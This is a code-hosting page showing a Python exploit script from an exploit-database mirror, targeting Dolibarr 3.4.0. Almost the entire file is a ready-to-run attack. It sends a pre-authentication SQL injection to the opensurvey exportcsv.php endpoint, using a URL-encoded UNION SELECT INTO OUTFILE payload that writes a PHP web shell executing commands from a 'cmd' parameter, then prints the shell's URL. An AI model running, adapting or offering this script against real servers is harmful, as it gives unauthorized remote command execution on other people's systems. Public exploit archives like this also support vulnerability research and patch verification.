PageRenderTime 43ms CodeModel.GetById 16ms RepoModel.GetById 0ms app.codeStats 0ms

/exploits/php/webapps/28971.py

https://bitbucket.org/DinoRex99/exploit-database
Python | 56 lines | 39 code | 3 blank | 14 comment | 0 complexity | 5614e2b6b3c3b5d331474db461ad83b4 MD5 | raw file
Possible License(s): GPL-2.0 
    

  1. # Exploit Title: Dolibarr 3.4.0 SQLi

    2. 

  2. # Date: 10/7/2013

    3. 

  3. # Exploit author: drone (@dronesec)

    4. 

  4. # More information: http://forelsec.blogspot.com/2013/10/dolibarr-340-multiple-vulnerabilities.html

    5. 

  5. # Vendor homepage: http://www.dolibarr.org/

    6. 

  6. # Software link: 

    7. 

  7. # Version: 3.4.0

    8. 

  8. # Fixed in: 3.4.1

    9. 

  9. # Tested on: Ubuntu 12.04 (apparmor disabled)

    10. 

  10. 

    11. 

  11. import urllib2

    12. 

  12. import string

    13. 

  13. import random

    14. 

  14. from argparse import ArgumentParser

    15. 

  15. 

    16. 

  16. """ Preauth web shell via SQL injection

    17. 

  17.     Dolibarr 3.4.0

    18. 

  18. """

    19. 

  19. 

    20. 

  20. def run(options):

    21. 

  21.     """ run exploit

    22. 

  22.     """

    23. 

  23.     print '[!] Dropping web shell on %s...' % options.ip

    24. 

  24.     shell = ''.join(random.choice(string.ascii_lowercase+string.digits) for x in range(5))

    25. 

  25.     sqli = 'http://{0}{1}/htdocs/opensurvey/public/exportcsv.php?sondage='\

    26. 

  26.                                             .format(options.ip, options.rootp)

    27. 

  27. 

    28. 

  28.     # ' UNION SELECT '<?php system($_GET['cmd'])?>,2,3,[..]13 INTO OUTFILE 'yourshell';-- -

    29. 

  29.     exploit = '\'%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20\'<?php%20system($_GET[\\\'cmd\\\'])?>\''\

    30. 

  30.               ',2,3,4,5,6,7,8,9,10,11,12,13%20INTO%20OUTFILE%20\'{0}/{1}.php\';%20--%20-%20'\

    31. 

  31.                         .format(options.path, shell)

    32. 

  32. 

    33. 

  33.     try:

    34. 

  34.         urllib2.urlopen(sqli + exploit)

    35. 

  35.         print '[!] Shell dropped.  http://%s%s/documents/%s.php?cmd=ls' % \

    36. 

  36.                                                     (options.ip, options.rootp, shell)

    37. 

  37.     except Exception, e:

    38. 

  38.         print '[-] %s' % e

    39. 

  39. 

    40. 

  40. def parse():

    41. 

  41.     """ Parse cli

    42. 

  42.     """

    43. 

  43.     parser = ArgumentParser()

    44. 

  44.     parser.add_argument('-i', help='Server address', action='store', dest='ip', required=True)

    45. 

  45.     parser.add_argument('-p', help='Path to Dolibarr install (/dolibarr)', action='store',

    46. 

  46.                             default='/dolibarr', dest='rootp')

    47. 

  47.     parser.add_argument('-w', help='Path to drop shell (/var/www/dolibarr/documents)',

    48. 

  48.                             action='store', default='/var/www/dolibarr/documents', dest='path')

    49. 

  49. 

    50. 

  50.     options = parser.parse_args()

    51. 

  51.     options.path = options.path if options.path[-1] != '/' else options.path[:-1]

    52. 

  52.     options.rootp = options.rootp if options.path[-1] != '/' else options.path[:-1]

    53. 

  53.     return options

    54. 

  54. 

    55. 

  55. if __name__ == "__main__":

    56. 

  56.     run(parse())
    57.